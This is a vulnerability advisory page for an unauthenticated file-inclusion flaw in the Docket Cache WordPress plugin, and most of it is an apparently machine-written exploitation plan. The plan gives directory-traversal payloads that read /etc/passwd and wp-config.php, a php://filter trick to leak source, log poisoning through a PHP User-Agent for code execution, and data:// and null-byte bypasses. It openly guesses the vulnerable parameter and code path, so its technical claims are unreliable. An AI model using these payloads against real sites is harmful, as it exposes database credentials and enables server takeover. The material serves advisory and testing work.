Docket Cache <= 24.07.03 - Unauthenticated Local File Inclusion
Description
The Docket Cache plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 24.07.03. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HTechnical Details
<=24.07.03Source Code
WordPress.org SVNThis research plan outlines the technical steps to analyze and exploit **CVE-2025-68506**, an unauthenticated Local File Inclusion (LFI) vulnerability in the **Docket Cache** WordPress plugin (versions <= 24.07.03). --- # Research Plan: CVE-2025-68506 - Docket Cache LFI ## 1. Vulnerability Summar…
Show full research plan
This research plan outlines the technical steps to analyze and exploit CVE-2025-68506, an unauthenticated Local File Inclusion (LFI) vulnerability in the Docket Cache WordPress plugin (versions <= 24.07.03).
Research Plan: CVE-2025-68506 - Docket Cache LFI
1. Vulnerability Summary
The Docket Cache plugin is designed to accelerate WordPress by caching objects and pages. Versions up to 24.07.03 contain a flaw where user-supplied input via a specific query parameter is passed directly into a PHP include or require statement without sufficient sanitization or access control. This allows an unauthenticated attacker to perform directory traversal and include arbitrary files from the server, potentially leading to Remote Code Execution (RCE) via log poisoning or inclusion of uploaded files.
2. Attack Vector Analysis
- Endpoint: The vulnerability is triggered via a GET request to the WordPress front-end (
/index.php) or the admin initialization sequence. - Vulnerable Parameter:
docket-cache-vieworview-log(inferred from common plugin features; to be verified in code). - Hook: Likely
initorplugins_loaded, as these run before authentication checks are enforced for general requests. - Preconditions: The plugin must be active. Some LFI sinks in Docket Cache may require the "Page Cache" or "Logging" feature to be enabled in the plugin settings.
3. Code Flow (Inferred)
- Entry Point: An unauthenticated user sends a GET request containing a specific parameter (e.g.,
?docket-cache-view=...). - Hook Execution: WordPress triggers the
inithook. The plugin's main class (e.g.,Docket_Cache) or a logger class (e.g.,Docket_Cache_Log) has a method registered to this hook. - Vulnerable Function: The handler checks for the presence of the trigger parameter.
- Location:
includes/class-docket-cache.phporincludes/admin/log.php.
- Location:
- The Sink: The plugin takes the parameter value, potentially appends it to a base path (like
DOCKET_CACHE_CONTENT_PATH), and calls a file inclusion function.- Code Pattern:
include_once DOCKET_CACHE_CONTENT_PATH . $_GET['docket-cache-view'];
- Code Pattern:
- Path Traversal: By using
../sequences, the attacker escapes the intended directory to access sensitive files like/etc/passwdorwp-config.php.
4. Nonce Acquisition Strategy
While the vulnerability is described as unauthenticated, some init handlers still check for nonces if they were originally intended for administrative use.
- Check for Nonce Check: Search the source for
check_ajax_refererorwp_verify_noncenear theincludesink. - Identify Variable: If a nonce is required, look for
wp_localize_scriptin the plugin code.- Potential Variable:
window.docket_cache_object?.nonce
- Potential Variable:
- Create Trigger Content: If the script only loads on the admin dashboard or specific pages, use WP-CLI to create a test post:
wp post create --post_type=page --post_status=publish --post_title="Log View" --post_content="[docket_cache_stats]"(Shortcode inferred). - Extract via Browser:
Usebrowser_navigateto the created page, then:browser_eval("window.docket_cache_data?.nonce")
Note: If the inclusion is directly in the init hook without a nonce check, this step is bypassed.
5. Exploitation Strategy
Step 1: Probe for LFI
Attempt to read /etc/passwd to confirm traversal.
- Request:
(Note: The exact parameter name should be confirmed by searching forGET /?docket-cache-view=../../../../../../../../etc/passwd HTTP/1.1 Host: localhost:8080$_GETor$_REQUESTin the plugin source.)
Step 2: Extract wp-config.php
To obtain database credentials and salts.
- Payload:
../../../../../../wp-config.php - Note: Since this is PHP, the server will execute it. To read the source, the LFI must be used in a context that outputs the file (like
file_get_contents) or we must use a PHP filter:- Payload:
php://filter/convert.base64-encode/resource=../../../../../../wp-config.php
- Payload:
Step 3: RCE via Log Poisoning (If applicable)
- Identify a log file path (e.g.,
wp-content/cache/docket-cache/docket-cache.log). - Inject PHP code into the User-Agent:
User-Agent: <?php phpinfo(); ?> - Include the log file via the LFI:
?docket-cache-view=../../../../cache/docket-cache/docket-cache.log
6. Test Data Setup
- Install & Activate:
wp plugin install docket-cache --version=24.07.03 --activate - Enable Logging (If required):
wp option update docket_cache_settings '{"page_cache":"request","log":"1"}' --format=json - Create Traversal Target: Ensure
/etc/passwdis readable in the environment or create a dummy file:echo "POC_SUCCESS" > /var/www/html/proof.txt
7. Expected Results
- Successful Traversal: The HTTP response body contains the contents of
/etc/passwd(starting withroot:x:0:0:...) or the contents of theproof.txtfile. - HTTP 200 OK: The request should return a 200 status code even when including system files.
8. Verification Steps
After sending the exploit request, verify the behavior:
- Response Inspection: Check if "root:x" or "POC_SUCCESS" appears in the
http_requestoutput. - Log Check: Use
wp eval "echo 'File included';". - Database Check: If
wp-config.phpwas successfully included and executed (in a way that leaks data), verify you can access the database using the leaked credentials.
9. Alternative Approaches
- PHP Wrappers: If
../is filtered, tryphp://filterordata://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==. - Null Byte Injection: For very old PHP versions (unlikely in this environment), try appending
%00to bypass extension enforcement (e.g.,.../etc/passwd%00). - Default Log Paths: If the plugin log is not accessible, attempt to include standard WordPress logs:
wp-content/debug.log.
Summary
The Docket Cache plugin for WordPress is vulnerable to unauthenticated Local File Inclusion (LFI) in versions up to 24.07.03. This flaw allows attackers to include arbitrary files from the server's filesystem by manipulating a query parameter used in a PHP inclusion statement, potentially leading to sensitive data exposure or remote code execution.
Exploit Outline
The exploit is executed by sending an unauthenticated GET request to the WordPress site. The attacker targets a query parameter (inferred as 'docket-cache-view' or 'view-log') processed during the plugin's initialization phase. By supplying a value containing directory traversal sequences (e.g., '../' characters), the attacker can escape the intended directory and force the plugin to include sensitive local files like 'wp-config.php' or system configuration files. If the attacker can also upload files or poison system logs, this inclusion can be leveraged to execute arbitrary PHP code.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.